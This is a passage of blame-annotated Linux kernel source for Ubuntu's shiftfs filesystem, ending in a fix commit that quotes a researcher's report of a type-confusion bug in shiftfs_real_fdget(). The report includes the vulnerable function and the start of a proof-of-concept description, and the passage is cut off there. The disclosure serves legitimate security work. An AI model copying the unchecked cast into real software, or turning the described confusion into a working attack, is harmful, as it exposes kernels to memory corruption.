|
|
2019-08-29 18:45:07 +00:00
|
|
|
if (!err) {
|
2019-04-04 13:39:12 +00:00
|
|
|
d_drop(dentry);
|
|
|
|
|
2019-08-29 18:45:07 +00:00
|
|
|
if (rmdir)
|
|
|
|
clear_nlink(inode);
|
|
|
|
else
|
|
|
|
drop_nlink(inode);
|
|
|
|
}
|
|
|
|
inode_unlock(loweri);
|
|
|
|
|
|
|
|
shiftfs_copyattr(loweri, dir);
|
2020-01-17 15:17:06 +00:00
|
|
|
dput(lowerd);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
|
|
|
|
{
|
|
|
|
return shiftfs_rm(dir, dentry, false);
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
|
|
|
|
{
|
|
|
|
return shiftfs_rm(dir, dentry, true);
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_rename(struct inode *olddir, struct dentry *old,
|
|
|
|
struct inode *newdir, struct dentry *new,
|
|
|
|
unsigned int flags)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
|
|
|
|
*lowerd_dir_new = new->d_parent->d_fsdata,
|
|
|
|
*lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
|
|
|
|
*trapd;
|
|
|
|
struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
|
|
|
|
*loweri_dir_new = lowerd_dir_new->d_inode;
|
2019-04-04 13:39:11 +00:00
|
|
|
int err = -EINVAL;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (trapd == lowerd_old || trapd == lowerd_new)
|
2019-04-04 13:39:11 +00:00
|
|
|
goto out_unlock;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
oldcred = shiftfs_override_creds(old->d_sb);
|
|
|
|
err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
|
|
|
|
NULL, flags);
|
|
|
|
revert_creds(oldcred);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
shiftfs_copyattr(loweri_dir_old, olddir);
|
|
|
|
shiftfs_copyattr(loweri_dir_new, newdir);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
out_unlock:
|
|
|
|
unlock_rename(lowerd_dir_new, lowerd_dir_old);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
|
|
|
|
unsigned int flags)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *new;
|
|
|
|
struct inode *newi;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
struct dentry *lowerd = dentry->d_parent->d_fsdata;
|
|
|
|
struct inode *inode = NULL, *loweri = lowerd->d_inode;
|
|
|
|
|
|
|
|
inode_lock(loweri);
|
|
|
|
oldcred = shiftfs_override_creds(dentry->d_sb);
|
|
|
|
new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
inode_unlock(loweri);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
if (IS_ERR(new))
|
|
|
|
return new;
|
|
|
|
|
|
|
|
dentry->d_fsdata = new;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
newi = new->d_inode;
|
|
|
|
if (!newi)
|
2019-04-04 13:39:11 +00:00
|
|
|
goto out;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
|
|
|
|
shiftfs_inode_test, shiftfs_inode_set, newi);
|
|
|
|
if (!inode) {
|
2019-04-04 13:39:11 +00:00
|
|
|
dput(new);
|
|
|
|
return ERR_PTR(-ENOMEM);
|
|
|
|
}
|
2019-04-04 13:39:12 +00:00
|
|
|
if (inode->i_state & I_NEW) {
|
|
|
|
/*
|
|
|
|
* inode->i_private set by shiftfs_inode_set(), but we still
|
|
|
|
* need to take a reference
|
|
|
|
*/
|
|
|
|
ihold(newi);
|
|
|
|
shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
|
|
|
|
unlock_new_inode(inode);
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
out:
|
|
|
|
return d_splice_alias(inode, dentry);
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_permission(struct inode *inode, int mask)
|
|
|
|
{
|
|
|
|
int err;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
|
|
|
struct inode *loweri = inode->i_private;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!loweri) {
|
|
|
|
WARN_ON(!(mask & MAY_NOT_BLOCK));
|
2019-04-04 13:39:11 +00:00
|
|
|
return -ECHILD;
|
2019-04-04 13:39:12 +00:00
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
err = generic_permission(inode, mask);
|
|
|
|
if (err)
|
|
|
|
return err;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(inode->i_sb);
|
|
|
|
err = inode_permission(loweri, mask);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_fiemap(struct inode *inode,
|
|
|
|
struct fiemap_extent_info *fieinfo, u64 start,
|
|
|
|
u64 len)
|
|
|
|
{
|
|
|
|
int err;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
struct inode *loweri = inode->i_private;
|
|
|
|
|
|
|
|
if (!loweri->i_op->fiemap)
|
|
|
|
return -EOPNOTSUPP;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(inode->i_sb);
|
|
|
|
if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
|
|
|
|
filemap_write_and_wait(loweri->i_mapping);
|
|
|
|
err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
2020-06-23 17:46:15 +00:00
|
|
|
static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
|
|
|
|
umode_t mode)
|
|
|
|
{
|
|
|
|
int err;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
|
|
|
struct inode *loweri = dir->i_private;
|
|
|
|
|
|
|
|
if (!loweri->i_op->tmpfile)
|
|
|
|
return -EOPNOTSUPP;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(dir->i_sb);
|
|
|
|
err = loweri->i_op->tmpfile(loweri, lowerd, mode);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:11 +00:00
|
|
|
static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
|
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = dentry->d_fsdata;
|
|
|
|
struct inode *loweri = lowerd->d_inode;
|
2019-04-13 19:41:01 +00:00
|
|
|
struct iattr newattr;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
2019-04-04 13:39:11 +00:00
|
|
|
struct super_block *sb = dentry->d_sb;
|
2019-11-01 18:35:25 +00:00
|
|
|
struct shiftfs_super_info *sbinfo = sb->s_fs_info;
|
2019-04-04 13:39:11 +00:00
|
|
|
int err;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
err = setattr_prepare(dentry, attr);
|
|
|
|
if (err)
|
|
|
|
return err;
|
|
|
|
|
2019-04-13 19:41:01 +00:00
|
|
|
newattr = *attr;
|
2019-11-01 18:35:25 +00:00
|
|
|
newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid);
|
|
|
|
newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-13 19:41:01 +00:00
|
|
|
/*
|
|
|
|
* mode change is for clearing setuid/setgid bits. Allow lower fs
|
|
|
|
* to interpret this in its own way.
|
|
|
|
*/
|
|
|
|
if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
|
|
|
|
newattr.ia_valid &= ~ATTR_MODE;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
inode_lock(loweri);
|
|
|
|
oldcred = shiftfs_override_creds(dentry->d_sb);
|
2019-04-11 12:31:04 +00:00
|
|
|
err = notify_change(lowerd, &newattr, NULL);
|
2019-04-04 13:39:12 +00:00
|
|
|
revert_creds(oldcred);
|
|
|
|
inode_unlock(loweri);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
shiftfs_copyattr(loweri, d_inode(dentry));
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
return err;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_getattr(const struct path *path, struct kstat *stat,
|
|
|
|
u32 request_mask, unsigned int query_flags)
|
|
|
|
{
|
|
|
|
struct inode *inode = path->dentry->d_inode;
|
2019-04-04 13:39:12 +00:00
|
|
|
struct dentry *lowerd = path->dentry->d_fsdata;
|
|
|
|
struct inode *loweri = lowerd->d_inode;
|
|
|
|
struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
|
|
|
|
struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
|
|
|
|
struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
|
|
|
|
struct user_namespace *to_ns = inode->i_sb->s_user_ns;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
int err;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(inode->i_sb);
|
|
|
|
err = vfs_getattr(&newpath, stat, request_mask, query_flags);
|
|
|
|
revert_creds(oldcred);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
if (err)
|
|
|
|
return err;
|
|
|
|
|
|
|
|
/* transform the underlying id */
|
2019-04-04 13:39:12 +00:00
|
|
|
stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
|
|
|
|
stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
|
2019-04-04 13:39:11 +00:00
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
#ifdef CONFIG_SHIFT_FS_POSIX_ACL
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int
|
|
|
|
shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
|
|
|
|
struct posix_acl *acl)
|
2019-04-04 13:39:11 +00:00
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
int i;
|
|
|
|
|
|
|
|
for (i = 0; i < acl->a_count; i++) {
|
|
|
|
struct posix_acl_entry *e = &acl->a_entries[i];
|
|
|
|
switch(e->e_tag) {
|
|
|
|
case ACL_USER:
|
|
|
|
e->e_uid = shift_kuid(from, to, e->e_uid);
|
|
|
|
if (!uid_valid(e->e_uid))
|
|
|
|
return -EOVERFLOW;
|
|
|
|
break;
|
|
|
|
case ACL_GROUP:
|
|
|
|
e->e_gid = shift_kgid(from, to, e->e_gid);
|
|
|
|
if (!gid_valid(e->e_gid))
|
|
|
|
return -EOVERFLOW;
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
return 0;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static void
|
|
|
|
shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
|
|
|
|
void *value, size_t size)
|
|
|
|
{
|
|
|
|
struct posix_acl_xattr_header *header = value;
|
|
|
|
struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
|
|
|
|
int count;
|
|
|
|
kuid_t kuid;
|
|
|
|
kgid_t kgid;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!value)
|
|
|
|
return;
|
|
|
|
if (size < sizeof(struct posix_acl_xattr_header))
|
|
|
|
return;
|
|
|
|
if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
|
|
|
|
return;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
count = posix_acl_xattr_count(size);
|
|
|
|
if (count < 0)
|
|
|
|
return;
|
|
|
|
if (count == 0)
|
|
|
|
return;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
for (end = entry + count; entry != end; entry++) {
|
|
|
|
switch(le16_to_cpu(entry->e_tag)) {
|
|
|
|
case ACL_USER:
|
|
|
|
kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
|
|
|
|
kuid = shift_kuid(from, to, kuid);
|
|
|
|
entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
|
|
|
|
break;
|
|
|
|
case ACL_GROUP:
|
|
|
|
kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
|
|
|
|
kgid = shift_kgid(from, to, kgid);
|
|
|
|
entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
|
|
|
|
break;
|
|
|
|
default:
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
|
2019-04-04 13:39:11 +00:00
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct inode *loweri = inode->i_private;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
struct posix_acl *lower_acl, *acl = NULL;
|
|
|
|
struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
|
|
|
|
struct user_namespace *to_ns = inode->i_sb->s_user_ns;
|
|
|
|
int size;
|
|
|
|
int err;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!IS_POSIXACL(loweri))
|
|
|
|
return NULL;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
oldcred = shiftfs_override_creds(inode->i_sb);
|
|
|
|
lower_acl = get_acl(loweri, type);
|
|
|
|
revert_creds(oldcred);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (lower_acl && !IS_ERR(lower_acl)) {
|
|
|
|
/* XXX: export posix_acl_clone? */
|
|
|
|
size = sizeof(struct posix_acl) +
|
|
|
|
lower_acl->a_count * sizeof(struct posix_acl_entry);
|
|
|
|
acl = kmemdup(lower_acl, size, GFP_KERNEL);
|
|
|
|
posix_acl_release(lower_acl);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!acl)
|
|
|
|
return ERR_PTR(-ENOMEM);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
refcount_set(&acl->a_refcount, 1);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
err = shift_acl_ids(from_ns, to_ns, acl);
|
|
|
|
if (err) {
|
|
|
|
kfree(acl);
|
|
|
|
return ERR_PTR(err);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
return acl;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int
|
|
|
|
shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
|
|
|
|
struct dentry *dentry, struct inode *inode,
|
|
|
|
const char *name, void *buffer, size_t size)
|
2019-04-04 13:39:11 +00:00
|
|
|
{
|
2019-04-04 13:39:12 +00:00
|
|
|
struct inode *loweri = inode->i_private;
|
|
|
|
int ret;
|
|
|
|
|
|
|
|
ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
|
|
|
|
buffer, size);
|
|
|
|
if (ret < 0)
|
|
|
|
return ret;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
inode_lock(loweri);
|
|
|
|
shift_acl_xattr_ids(loweri->i_sb->s_user_ns, inode->i_sb->s_user_ns,
|
|
|
|
buffer, size);
|
|
|
|
inode_unlock(loweri);
|
|
|
|
return ret;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int
|
|
|
|
shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
|
|
|
|
struct dentry *dentry, struct inode *inode,
|
|
|
|
const char *name, const void *value,
|
|
|
|
size_t size, int flags)
|
|
|
|
{
|
|
|
|
struct inode *loweri = inode->i_private;
|
|
|
|
int err;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!IS_POSIXACL(loweri) || !loweri->i_op->set_acl)
|
|
|
|
return -EOPNOTSUPP;
|
|
|
|
if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
|
|
|
|
return value ? -EACCES : 0;
|
|
|
|
if (!inode_owner_or_capable(inode))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if (value) {
|
|
|
|
shift_acl_xattr_ids(inode->i_sb->s_user_ns,
|
|
|
|
loweri->i_sb->s_user_ns,
|
|
|
|
(void *)value, size);
|
|
|
|
err = shiftfs_setxattr(dentry, inode, handler->name, value,
|
|
|
|
size, flags);
|
|
|
|
} else {
|
|
|
|
err = shiftfs_removexattr(dentry, handler->name);
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!err)
|
|
|
|
shiftfs_copyattr(loweri, inode);
|
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static const struct xattr_handler
|
|
|
|
shiftfs_posix_acl_access_xattr_handler = {
|
|
|
|
.name = XATTR_NAME_POSIX_ACL_ACCESS,
|
|
|
|
.flags = ACL_TYPE_ACCESS,
|
|
|
|
.get = shiftfs_posix_acl_xattr_get,
|
|
|
|
.set = shiftfs_posix_acl_xattr_set,
|
2019-04-04 13:39:11 +00:00
|
|
|
};
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static const struct xattr_handler
|
|
|
|
shiftfs_posix_acl_default_xattr_handler = {
|
|
|
|
.name = XATTR_NAME_POSIX_ACL_DEFAULT,
|
|
|
|
.flags = ACL_TYPE_DEFAULT,
|
|
|
|
.get = shiftfs_posix_acl_xattr_get,
|
|
|
|
.set = shiftfs_posix_acl_xattr_set,
|
2019-04-04 13:39:11 +00:00
|
|
|
};
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
#else /* !CONFIG_SHIFT_FS_POSIX_ACL */
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
#define shiftfs_get_acl NULL
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
#endif /* CONFIG_SHIFT_FS_POSIX_ACL */
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static const struct inode_operations shiftfs_dir_inode_operations = {
|
|
|
|
.lookup = shiftfs_lookup,
|
|
|
|
.mkdir = shiftfs_mkdir,
|
|
|
|
.symlink = shiftfs_symlink,
|
|
|
|
.unlink = shiftfs_unlink,
|
|
|
|
.rmdir = shiftfs_rmdir,
|
|
|
|
.rename = shiftfs_rename,
|
|
|
|
.link = shiftfs_link,
|
|
|
|
.setattr = shiftfs_setattr,
|
|
|
|
.create = shiftfs_create,
|
|
|
|
.mknod = shiftfs_mknod,
|
|
|
|
.permission = shiftfs_permission,
|
|
|
|
.getattr = shiftfs_getattr,
|
|
|
|
.listxattr = shiftfs_listxattr,
|
|
|
|
.get_acl = shiftfs_get_acl,
|
|
|
|
};
|
|
|
|
|
|
|
|
static const struct inode_operations shiftfs_file_inode_operations = {
|
|
|
|
.fiemap = shiftfs_fiemap,
|
|
|
|
.getattr = shiftfs_getattr,
|
|
|
|
.get_acl = shiftfs_get_acl,
|
|
|
|
.listxattr = shiftfs_listxattr,
|
|
|
|
.permission = shiftfs_permission,
|
|
|
|
.setattr = shiftfs_setattr,
|
2020-06-23 17:46:15 +00:00
|
|
|
.tmpfile = shiftfs_tmpfile,
|
2019-04-04 13:39:12 +00:00
|
|
|
};
|
|
|
|
|
|
|
|
static const struct inode_operations shiftfs_special_inode_operations = {
|
|
|
|
.getattr = shiftfs_getattr,
|
|
|
|
.get_acl = shiftfs_get_acl,
|
|
|
|
.listxattr = shiftfs_listxattr,
|
|
|
|
.permission = shiftfs_permission,
|
|
|
|
.setattr = shiftfs_setattr,
|
|
|
|
};
|
|
|
|
|
|
|
|
static const struct inode_operations shiftfs_symlink_inode_operations = {
|
|
|
|
.getattr = shiftfs_getattr,
|
|
|
|
.get_link = shiftfs_get_link,
|
|
|
|
.listxattr = shiftfs_listxattr,
|
|
|
|
.setattr = shiftfs_setattr,
|
|
|
|
};
|
|
|
|
|
|
|
|
static struct file *shiftfs_open_realfile(const struct file *file,
|
2019-10-02 07:57:14 +00:00
|
|
|
struct inode *realinode)
|
2019-04-04 13:39:12 +00:00
|
|
|
{
|
2019-10-02 07:57:14 +00:00
|
|
|
struct file *realfile;
|
|
|
|
const struct cred *old_cred;
|
2019-04-04 13:39:12 +00:00
|
|
|
struct inode *inode = file_inode(file);
|
2019-10-02 07:57:14 +00:00
|
|
|
struct dentry *lowerd = file->f_path.dentry->d_fsdata;
|
2019-04-04 13:39:12 +00:00
|
|
|
struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
|
2019-10-02 07:57:14 +00:00
|
|
|
struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
|
2019-04-04 13:39:12 +00:00
|
|
|
|
2019-10-02 07:57:14 +00:00
|
|
|
old_cred = shiftfs_override_creds(inode->i_sb);
|
|
|
|
realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
|
|
|
|
info->creator_cred);
|
|
|
|
revert_creds(old_cred);
|
2019-04-04 13:39:12 +00:00
|
|
|
|
2019-10-02 07:57:14 +00:00
|
|
|
return realfile;
|
2019-04-04 13:39:12 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
#define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
|
|
|
|
|
|
|
|
static int shiftfs_change_flags(struct file *file, unsigned int flags)
|
|
|
|
{
|
|
|
|
struct inode *inode = file_inode(file);
|
|
|
|
int err;
|
|
|
|
|
|
|
|
/* if some flag changed that cannot be changed then something's amiss */
|
|
|
|
if (WARN_ON((file->f_flags ^ flags) & ~SHIFTFS_SETFL_MASK))
|
|
|
|
return -EIO;
|
|
|
|
|
|
|
|
flags &= SHIFTFS_SETFL_MASK;
|
|
|
|
|
|
|
|
if (((flags ^ file->f_flags) & O_APPEND) && IS_APPEND(inode))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if (flags & O_DIRECT) {
|
|
|
|
if (!file->f_mapping->a_ops ||
|
|
|
|
!file->f_mapping->a_ops->direct_IO)
|
|
|
|
return -EINVAL;
|
|
|
|
}
|
|
|
|
|
|
|
|
if (file->f_op->check_flags) {
|
|
|
|
err = file->f_op->check_flags(flags);
|
|
|
|
if (err)
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
spin_lock(&file->f_lock);
|
|
|
|
file->f_flags = (file->f_flags & ~SHIFTFS_SETFL_MASK) | flags;
|
|
|
|
spin_unlock(&file->f_lock);
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_open(struct inode *inode, struct file *file)
|
|
|
|
{
|
|
|
|
struct file *realfile;
|
|
|
|
|
2019-10-02 07:57:14 +00:00
|
|
|
realfile = shiftfs_open_realfile(file, inode->i_private);
|
|
|
|
if (IS_ERR(realfile))
|
2019-04-04 13:39:12 +00:00
|
|
|
return PTR_ERR(realfile);
|
|
|
|
|
2019-10-02 07:57:14 +00:00
|
|
|
file->private_data = realfile;
|
2019-07-19 15:50:46 +00:00
|
|
|
/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
|
|
|
|
file->f_mapping = realfile->f_mapping;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
2019-10-02 07:57:14 +00:00
|
|
|
static int shiftfs_dir_open(struct inode *inode, struct file *file)
|
2019-04-04 13:39:12 +00:00
|
|
|
{
|
2019-10-02 07:57:14 +00:00
|
|
|
struct file *realfile;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
struct dentry *lowerd = file->f_path.dentry->d_fsdata;
|
|
|
|
struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
|
|
|
|
struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
|
|
|
|
realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
|
|
|
|
info->creator_cred);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
if (IS_ERR(realfile))
|
|
|
|
return PTR_ERR(realfile);
|
2019-04-04 13:39:12 +00:00
|
|
|
|
2019-10-02 07:57:14 +00:00
|
|
|
file->private_data = realfile;
|
2019-04-04 13:39:12 +00:00
|
|
|
|
2019-10-02 07:57:14 +00:00
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_release(struct inode *inode, struct file *file)
|
|
|
|
{
|
|
|
|
struct file *realfile = file->private_data;
|
|
|
|
|
|
|
|
if (realfile)
|
|
|
|
fput(realfile);
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
2019-10-02 07:57:14 +00:00
|
|
|
static int shiftfs_dir_release(struct inode *inode, struct file *file)
|
|
|
|
{
|
|
|
|
return shiftfs_release(inode, file);
|
|
|
|
}
|
|
|
|
|
2019-04-16 16:29:00 +00:00
|
|
|
static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
|
|
|
|
{
|
2019-10-02 07:57:14 +00:00
|
|
|
struct file *realfile = file->private_data;
|
2019-04-16 16:29:00 +00:00
|
|
|
|
|
|
|
return vfs_llseek(realfile, offset, whence);
|
|
|
|
}
|
|
|
|
|
|
|
|
static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
|
2019-04-04 13:39:12 +00:00
|
|
|
{
|
|
|
|
struct inode *realinode = file_inode(file)->i_private;
|
|
|
|
|
|
|
|
return generic_file_llseek_size(file, offset, whence,
|
|
|
|
realinode->i_sb->s_maxbytes,
|
|
|
|
i_size_read(realinode));
|
|
|
|
}
|
|
|
|
|
|
|
|
/* XXX: Need to figure out what to to about atime updates, maybe other
|
|
|
|
* timestamps too ... ref. ovl_file_accessed() */
|
|
|
|
|
|
|
|
static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
|
|
|
|
{
|
|
|
|
int ifl = iocb->ki_flags;
|
|
|
|
rwf_t flags = 0;
|
|
|
|
|
|
|
|
if (ifl & IOCB_NOWAIT)
|
|
|
|
flags |= RWF_NOWAIT;
|
|
|
|
if (ifl & IOCB_HIPRI)
|
|
|
|
flags |= RWF_HIPRI;
|
|
|
|
if (ifl & IOCB_DSYNC)
|
|
|
|
flags |= RWF_DSYNC;
|
|
|
|
if (ifl & IOCB_SYNC)
|
|
|
|
flags |= RWF_SYNC;
|
|
|
|
|
|
|
|
return flags;
|
|
|
|
}
|
|
|
|
|
UBUNTU: SAUCE: shiftfs: prevent type confusion
BugLink: https://bugs.launchpad.net/bugs/1850867
Verify filesystem type in shiftfs_real_fdget().
Quoting Jann Horn:
#################### Bug 2: Type confusion ####################
shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
passes the resulting file* into shiftfs_real_fdget(), which does this:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
file->private_data is a void* that points to a filesystem-dependent type; and
some filesystems even use it to store a type-cast number instead of a pointer.
The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
(with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
offset 0x10), and I use that to cause a memory dereference somewhere around
